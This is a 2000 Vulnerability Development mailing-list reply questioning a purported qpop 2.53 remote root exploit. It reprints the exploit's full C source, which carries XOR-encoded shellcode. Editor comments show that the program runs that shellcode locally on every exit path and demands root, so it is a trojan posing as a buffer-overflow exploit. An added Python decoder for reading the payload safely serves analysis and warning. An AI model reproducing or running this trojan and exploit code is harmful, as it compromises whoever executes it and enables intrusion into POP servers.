Vulnerability Development mailing list archives
Re: QPOP2.5* exploit ??
From: mixter () NEWYORKOFFICE COM (Martin Ixter)
Date: Mon, 15 May 2000 01:32:53 +0300
hmm, to be honest, that sounds like FUD to me... the supposed shellcode doesn't seem to contain x86 commands that make much sense... the first few bytes resemble x86 instructions pusha and testl, after that there are no consistent instructions following... the cat -v output follows, doesn't look like valid x86 shellcode to me. can you provide the full exploit to verify which command this program supposedly tries to overflow?

M-k^M-kM-hM-xM-^?M-^?M-^?^@M-F1M-If^@^@M-k3-`kl-qj/a^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@-q`kl-kdamldke"/c"~"ockn"/q"qmnucp"gvamulxBjmvockn,amo"<<"-fgt-lwnn9"gajm"%)")%"<<"|pmmv-,pjmqvq9"par"nrBqikllgp,vpfnli,amo8-wqp-qrmmn-nr-omfgn-qmnucp,vcp"qmnucp,vcp9"vcp"/ztd"qmnucp("<<"-fgt-lwnn9"af"qmnucp9"ajomf")z"qmnucp,qj9",-qmnucp,qj"<<"-fgt-lwnn9"af",,9"po"/pd"qmnucp(9^@M-ne)W^@M-g^@M-nTQM-jY^@AM-5^@M-1M-lyy^@wM-r^@^@M-lyy^@GM-v^@^@"M-lyy^@GM-zM-EG^@^@OM-rM-: 3^@Q^@M-qI^@3A^@gM-jY\EA^@^@

PS: but upgrading to qpop 3 is a good idea anyways (as long as people upgrade to the latest secure version)

________________________
mixter () newyorkoffice com
http://1337.tsx.org

be safe. I would not recommend running this on your own machine unless you crack the shellcode and see what it does.
/* PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!!
 *
 * qpop 2.53 remote root exploit for linux
 * tested on redhat 6.x and 5.x, and slack7
 * offsets for redhat 6: 100
 *             redhat 5: 150
 *             slackware: 200
 *
 * these offsets were an average, however the buffer is small and
 * the address must almost be exact. Perhaps try a offset brute forcer.
 *
 * code by John Slockavich, copyright Febuary 25th, 2000
 * this code for educational purposes only
 *
 * If this exploit is successful, you should have a bindshell on port 1524
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#include <linux/ip.h>

#define RET   0xbffff6b2
#define NOP   0x90
#define PORT  110
#define BSIZE 512

/* Editor's note: qpop_proc is pointed at the shellcode bytes in main() and
 * called from quit(), so on every exit path (connect failure, write failure,
 * normal end) this program executes its own shellcode on the machine it is
 * run from, not on the target host. */
int (*qpop_proc)();
void quit(int x);

char shellcode[] =
    "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x80\x36\x02\x46\xe2\xfa"
    "\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f"
    "\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d"
    "\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22"
    "\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d"
    "\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22"
    "\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22"
    "\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71"
    "\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70"
    "\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e"
    "\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63"
    "\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f"
    "\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74"
    "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61"
    "\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22"
    "\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74"
    "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70"
    "\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b"
    "\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f"
    "\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81"
    "\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09"
    "\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1"
    "\x92\x92";

void usage(char *name)
{
    fprintf(stderr, "qpop 2.53 exploit by John Slockavich\n"
                    "Usage: %s <hostname> <offset>\n", name);
    exit(1);
}

int main(int argc, char **argv)
{
    struct sockaddr_in sin;
    struct hostent *he;
    char *hostname, *ptr, *buff;
    char sendbuf[BSIZE + 20];
    long *addr_ptr, addr;
    int rfd;
    int sfd;
    int i;
    int offset = 0;

    if (argc < 2)
        usage(argv[0]);
    hostname = argv[1];
    if (argv[2])
        offset = atoi(argv[2]);

    /* gcc cast-as-lvalue extension: make qpop_proc point at the shellcode */
    (char *)qpop_proc = shellcode;

    if (!(buff = malloc(BSIZE))) {
        perror("malloc");
        exit(0);
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    if ((he = gethostbyname(hostname)) == NULL) {
        herror("resolve");
        exit(0);
    }
    bcopy(he->h_addr, (struct in_addr *)&sin.sin_addr, he->h_length);

    /* rfd is opened and never used; a raw socket can only be created by
     * root, so this line forces the program to be run with root privileges */
    if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
        perror("socket");
        exit(1);
    }
    if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }

    addr = RET - offset;
    printf("preparing buffer using addr 0x%x\n", addr);

    /* fill buff with the return address, then NOPs in the first half,
     * then the shellcode centred in the buffer */
    ptr = buff;
    addr_ptr = (long *)ptr;
    for (i = 0; i < BSIZE; i += 4)
        *(addr_ptr++) = addr;
    for (i = 0; i < BSIZE / 2; i++)
        buff[i] = NOP;
    ptr = buff + ((BSIZE / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[BSIZE - 1] = '\0';

    if (connect(sfd, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("connect");
        quit(1);
    }
    printf("connected, sending shellcode...\n");
    snprintf(sendbuf, sizeof(sendbuf) - 1, "USER %s\n", buff);
    if (write(sfd, sendbuf, strlen(sendbuf)) < 0) {
        perror("write");
        quit(1);
    }
    close(sfd);
    quit(0);
}

void quit(int x)
{
    qpop_proc();   /* executes the shellcode bytes locally */
    exit(x);
}
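The advice above to crack the shellcode before running anything is the right call, because quit() in the posted program hands control to the shellcode bytes on the machine running it. The Python below is an added example, not part of this post or the posted program: it pulls the \xNN literal out of C source, looks for the decoder loop that opens the posted string (a jmp/call/pop %esi getpc sequence, then mov $N,%cx; xorb $K,(%esi); inc %esi; loop, which on the posted bytes reads N=0x18c and K=0x02), and undoes the XOR so the payload can be read instead of executed. It runs on a constructed sample that uses the same stub with a harmless made-up command; the function and constant names are mine.

```python
import re

# Decoder stub that opens the posted shellcode: jmp/call/pop to get the payload
# address into %esi, add $0xf,%esi, xor %ecx,%ecx, mov $N,%cx ... (N, K follow).
STUB_HEAD = bytes.fromhex("eb035eeb05e8f8ffffff83c60f31c966b9")
# mov $N,%cx ; xorb $K,(%esi) ; inc %esi ; loop   -> captures N and K
XOR_LOOP = re.compile(rb"\x66\xb9(..)\x80\x36(.)\x46\xe2\xfa", re.DOTALL)


def build_sample(cmd: bytes, key: int = 0x02) -> str:
    """Constructed sample: encode a harmless command the same way the posted
    bytes are encoded and emit it as a C string literal (not the posted bytes)."""
    body = bytes(b ^ key for b in cmd + b"\x00")
    raw = (STUB_HEAD + len(body).to_bytes(2, "little")
           + bytes([0x80, 0x36, key, 0x46, 0xE2, 0xFA]) + body)
    return '"' + "".join(f"\\x{b:02x}" for b in raw) + '"'


def c_literal_bytes(src: str) -> bytes:
    """Collect every \\xNN escape of a C char[] initializer, in order."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", src))


def decode_xor_stub(code: bytes):
    """Locate the 'mov $N,%cx; xorb $K,(%esi); inc; loop' decoder and undo it.
    Returns (key, decoded payload) or None if no such loop is present."""
    m = XOR_LOOP.search(code)
    if m is None:
        return None
    length = int.from_bytes(m.group(1), "little")
    key = m.group(2)[0]
    encoded = code[m.end():m.end() + length]   # loop starts right after itself
    return key, bytes(b ^ key for b in encoded)


def printable_strings(data: bytes, min_len: int = 6):
    """ASCII runs in the decoded payload; embedded shell commands show up here."""
    return [s.decode() for s in re.findall(rb"[ -~]{%d,}" % min_len, data)]


if __name__ == "__main__":
    literal = build_sample(b"echo constructed sample")
    key, payload = decode_xor_stub(c_literal_bytes(literal))
    print(f"xor key 0x{key:02x}:", printable_strings(payload))
```

Feeding the posted char shellcode[] text to c_literal_bytes() and decode_xor_stub() gives the plaintext the cat -v output above shows in encoded form, without ever executing it.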